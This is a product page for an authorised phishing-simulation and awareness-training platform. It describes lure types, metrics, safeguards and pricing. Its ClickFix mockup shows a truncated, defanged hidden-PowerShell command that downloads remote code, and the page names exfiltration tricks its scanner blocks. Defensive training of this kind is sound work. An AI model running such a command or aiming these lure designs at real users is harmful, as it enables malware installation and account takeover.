Phishing simulation & awareness training

See who clicks on a fake phishing email
before a real attacker sends one.

Phishtime runs realistic, authorised phishing simulations against your own employees and turns every click into a training moment. Email, QR codes, attachments, MFA-fatigue prompts, SMS and Viber, measured by name, with timestamps.

Free for up to 25 employees, no card required No real credentials are ever captured 🇪🇺 EU-hosted
Why simulate

Awareness training people actually remember

Three reasons a yearly e-learning module is not a security control.

A video in January proves nothing in June

Completion rates measure attendance, not behaviour. A simulation tells you who approved the push prompt, who scanned the code, who typed their password this month, by name, with timestamps.

Attackers moved on. Most simulators didn't.

Credential forms are the easy case. Real intrusions run through MFA approval fatigue, OAuth consent screens, device-code flows, and QR codes on a phone your endpoint agent never sees, "just paste this into the Run box" included.

A click without a follow-up is wasted

The teachable second is the second after someone clicks. Phishtime shows them, right then, exactly which signals they missed in their own language instead of adding a row to a spreadsheet nobody reads.

Even trained eyes slip under pressure

A bad week, a tight deadline, a full inbox. The signals someone learned last quarter get forgotten. Phishtime runs campaigns on your schedule, so your people get a reminder when it matters, not a certificate from six months ago.

How it works

Four steps, first campaign in under an hour

01 - LOAD

Load your people

Import a CSV, or sync straight from Microsoft Entra ID. However you bring them in, group employees by department, office or risk, then scope a campaign to one group without touching the rest.

02 - CHOOSE

Pick a lure

30+ ready-made templates with matching landing pages covering Microsoft 365, Google, DHL, DocuSign, Teams, Zoom, Dropbox and more, in every attack style we support. Clone one and edit it, or write your own.

03 - LAUNCH

Send it

From our managed mail, or from your own domain with your own DKIM. All at once, dripped across a window, or scheduled for a date. Preview and test-send before a single employee is touched.

04 - TRAIN

Measure and train

Clicks, submissions, opens and reports land in real time. Anyone who falls for it gets the awareness page explaining exactly what they missed, and the numbers roll up into reports you can hand to a board.

Attack coverage

Eight ways to be phished. Simulate all of them.

Every one of these is a shipped campaign type you can launch today - not a roadmap item.

Tracked link

The classic. Click through to a realistic sign-in page and see who hands over credentials under time pressure.

Records open · click · submit

QR code - quishing

The code sits in the mail body; the victim scans it with a personal phone, stepping clean past the firewall, the endpoint agent and every other control that only watches the corporate laptop. The oldest bypass of the newest controls.

Records scan as click
Q3_Invoice_Overdue.docx184 KB · finance-shared@

Tracked attachment

HTML, TXT, DOCX or XLSX, generated by us, beaconing on open, or carrying the tracked link inside. Tests who opens files from strangers.

Records open beacon · click
Approve sign-in?
Ljubljana, SI · new device
Deny Approve
Landing

MFA push approval

An "Approve this sign-in?" prompt, the way a real MFA-fatigue attack looks. See who waves a push through and who denies it.

Records approved vs denied
Expense Sync wants access
Read your mail Read your contacts
Cancel Allow
Landing

OAuth consent

A mimicked app-consent screen. Consent is how a token gets stolen without a password ever being typed, and no password reset fixes it.

Records consented
Enter code to continue
WXTQ-4821
↳ microsoft.com/devicelogin
Landing

Device code

A lure that mimics a shared-document notification, "Finance shared a file with you", which leads to a real-looking device code and sign-in flow instead of a document. A favourite of real intrusion sets, and almost nobody trains for it.

Records code entered
Win + R → Run
powershell -w hidden -c "iwr hxxp://…
Landing

ClickFix / fake CAPTCHA

"Prove you're human: run this command." The instructions adapt to the device: Win+R on Windows, Terminal via Spotlight on a Mac, a terminal shortcut on Linux, so it measures who will run a command a web page told them to, on whatever they're actually using.

Records command executed
Your parcel couldn't be delivered. Reschedule now: post-track.example/r/8k2 Today 14:02
Messaging

SMS & Viber

The same campaign machinery, delivered over messaging channels from your own registered sender. Smishing lands where email filters aren't.

Records click · submit
Advanced lures (MFA, OAuth, device code) are included from the Starter plan up, and unlocked for everyone during the 30-day trial. See how each attack type works →
Reporting

Numbers you can put in front of a board

Every number means the same thing wherever you see it, with the same definition on screen, in a PDF report, and in a CSV export, so nothing you show a board has to be double-checked first.

▸Phish-prone percentage (PPP): clicked ÷ delivered, plus PPP net of reporters, which subtracts only the people who clicked and then reported, so a healthy organisation never produces a negative number.
▸Reporting rate: how many people reported it to IT or security instead of just deleting it. The number that actually predicts whether your team hears about the real one.
▸Repeat-clicker rate: people who clicked in two or more campaigns, out of the people who were in two or more. The denominator the "keep it under 5%" target assumes.
▸Time to click, time to report: median and p90. How long IT or the SOC would actually have had to respond, in a real incident.
▸Per-employee event chain: SENT 10:23 · OPEN 10:24 · CLICK 10:25 · SUBMIT 10:25, per person, per campaign.
▸Exports: CSV from Starter, per-campaign PDF from Pro, cross-campaign period reports with department slicing and period-over-period comparison on Enterprise.
Training

The teachable second is the second after the click

Awareness at the moment of failure

Anyone who clicks or submits is shown a page walking through the exact indicators in the mail they just fell for; the sender domain, the urgency, the mismatched link, plus a follow-up email carrying the same content.

In their own language

Training is delivered in each employee's own training language, not the campaign's. Enable the languages your organisation actually uses and set a default per person, by import or by directory sync.

An employee portal, not a shame list

Employees sign in to see their own score, points and history: Resisted, Opened, Clicked, Submitted. The leaderboard shows full names, initials only, or nothing at all: your call, because a public wall of shame trains people to hide clicks.

Safety by design

A simulator is only useful if it can't become the real thing

No credentials, ever

A submitted form records that a field was filled and what it was called. The value is dropped before it reaches the database. There is no plaintext password to leak, because none is stored.

Verified recipients only

Campaigns can only reach email domains your organisation has verified. The same check applies to test sends, so Phishtime cannot be pointed at anyone outside your workforce.

Content that can't exfiltrate

Every template and landing page is scanned before it is saved: off-platform form targets, <base>, meta-refresh and formaction tricks are rejected, and landing pages run under a script-restricting CSP.

Isolation in the database

The database itself, not just the application, scopes every query to your company under a restricted role with no bypass privileges. An application bug cannot reach another company's rows. The database refuses, before the bug ever gets the chance.

Secrets encrypted at rest

SMTP passwords, SSO client secrets, API keys and MFA seeds are AES-256-GCM encrypted, with a documented key-rotation path.

Everything on the record

An append-only audit log of every administrative action, tenant-scoped and exportable to CSV and to your SIEM over the API on Enterprise.

Integrations

Fits the IT you already have

Identity & directory

✓Microsoft Entra ID single sign-on, per tenant
✓Employee sync from Entra / Azure AD, scoped to chosen groups
✓Google sign-in for administrators
✓TOTP and passkey MFA, enforceable across the whole tenant
✓Peer administrators you invite and manage yourself

Mail & infrastructure

✓Your own SMTP relay, sending domain and DKIM signing
✓SPF / DKIM / DMARC guide, pre-filled with your actual domain
✓Custom landing domains with automatic TLS
✓Mail-scanner detection, so security tooling clicking your links doesn't inflate the click rate
✓SOC mailbox ingest - "Report Phishing" from Outlook captured automatically
✓REST API, API keys, and audit-log export for your SIEM
Pricing

Priced per employee. Free under 25.

You buy seats, not a bracket. The per-seat rate falls as you add people, and every plan includes the full simulate → land → measure → train loop.

🛡️ Cybersecurity Awareness Month - -30% on every paid plan, applied automatically at checkout.
It's October - the month attackers bet on year-round habits. Train your team to spot them first. Locked in for as long as you stay on the plan.
Hello World Start here
Free
Up to 25 employees, one campaign a month - forever, not a trial. What's included →
  • Email simulations
  • Landing pages & tracking
  • Awareness training pages
  • Employee portal
Create your account
Starter
€0.98 €0.69 / seat / mo
Up to 250 employees. Send from your own domain.
  • Own sending domain & SMTP
  • Advanced lures (MFA / OAuth)
  • Scheduled campaigns
  • REST API & CSV export
Compare plans
Pro Popular
€1.14 €0.80 / seat / mo
Up to 1,000 employees. The full attack surface.
  • Everything in Starter
  • SMS & Viber campaigns
  • Custom landing domains
  • SOC mailbox ingest
  • Drip sends, branding, PDF reports
See pricing
Enterprise
€1.31 €0.92 / seat / mo
Unlimited employees, identity integration, evidence.
  • Everything in Pro
  • Entra ID SSO & directory sync
  • Audit log API for your SIEM
  • Cross-campaign executive reporting
Talk to us
Questions

The ones everybody asks first

Is this legal?

Yes - when you run it against your own workforce, on domains your organisation has verified. Phishtime enforces both: a campaign cannot reach an address outside your verified domains, and every administrator accepts terms stating plainly what the platform may be used for. Speak to HR or your works council before the first campaign; the docs include a pre-launch authorisation checklist.

Do you see our employees' passwords?

No. When someone submits a simulated login form, Phishtime records that a field was filled and what the field was called. The value never reaches storage, and no setting changes that.

Will this get our domain blacklisted?

Send through our managed mail and your own domain is not involved at all. If you send from your own domain, the built-in deliverability guide gives you the exact SPF, DKIM and DMARC records for it, plus a test-send path to verify before you launch.

Won't our mail filter click every link and ruin the data?

No. Automated mail-security scanning follows links to inspect them before your employees ever see the message, which would otherwise look like a click that never happened. Known scanner traffic is recognised and left out of the numbers, so what you see is people, not filters.

Can employees see each other's scores?

Only if you want them to. The leaderboard can show full names, initials only, or be switched off entirely - each employee always sees their own score either way.

What happens when the trial ends?

Nothing is deleted, and the workspace doesn't go read-only - it settles onto the free Hello World plan. Email simulations, landing pages, awareness training and the employee portal keep working, capped at 25 employees and one campaign every 30 days. Paid-only features - your own sending domain, advanced lures, the API - switch off automatically and come straight back the moment you pick a plan. The one thing that pauses: if you're carrying more employees than your plan allows (common right after a downgrade), launching a new campaign is blocked until you archive people down to the cap or add seats.

Run one simulation.

Sign up free, add a few test email addresses, and send your first campaign today - no card, no sales call. In a week you'll know more about your real risk than a whole year of e-learning completion certificates ever showed you.